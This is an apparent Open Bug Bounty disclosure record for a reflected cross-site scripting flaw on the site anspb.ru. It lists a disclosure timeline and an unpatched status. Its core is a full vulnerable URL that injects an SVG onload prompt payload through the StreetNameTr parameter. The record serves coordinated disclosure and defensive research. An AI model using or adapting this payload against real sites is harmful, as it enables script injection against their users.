anspb.ru XSS vulnerability

2017-08-05T13:31:00
ID OBB:276045
Type openbugbounty
Reporter M0r3h4x
Modified 2017-11-03T14:40:00

Description

Vulnerable URL:
https://anspb.ru/ajaxdata/obj_find.php?v=2&r;=1&a;=10;&StreetNameTr;=xss%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&StreetType;=street&adv;=0&p;=&s;=&pmin;=&pmax;=&smin;=&smax;=&srmin;=&srmax;=&skmin;=&skmax;=&semin;=&semax;=&plmin;=&plmax;=&lcmin;=&lcmax;=&d;=&m;=&t;=&tco;=&fav;=&ht;=&lvl;=&for;=&wd;=&tl;=&so;=&pp1;=&pp2;=&mc;=&mz;=&UrSt;=&UrStLand;=&floormin;=&floormax;=&floormin1;=&floormax1;=&oid;=&minrentmetr;=&amountDay;=&selHouseType;=&selDecorType;=&selObjSrok;=&dev;=&complex;=&GroupComplexName;=&ReLimit;=&novtype;=&ComplexId;=&selBlocks;=&GetComplexNameTr;=&devtrname;=&complextrname;=&orderflat;=&nolimit;=&onlyads;=&disableads;=0&complexmaps;=&rent;_comission=&GroupComplexNameTr;=&CityNameTr;=&CityType;=&adt;=&assignment;=&counter;=1&StreetName;=%D0%9E%D1%81%D0%B8%D0%BF%D0%B5%D0%BD%D0%BA%D0%BE&nomoreads;=1&AddComplex;=

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 03.11.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 528517
VIP website status:| No
anspb.ru SSL connection:| Grade: A+

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 5 August, 2017 13:31 GMT
Generic security notifications sent to website owner| 7 August, 2017 15:20 GMT
Vulnerability details disclosed by researcher| 3 November, 2017 14:40 GMT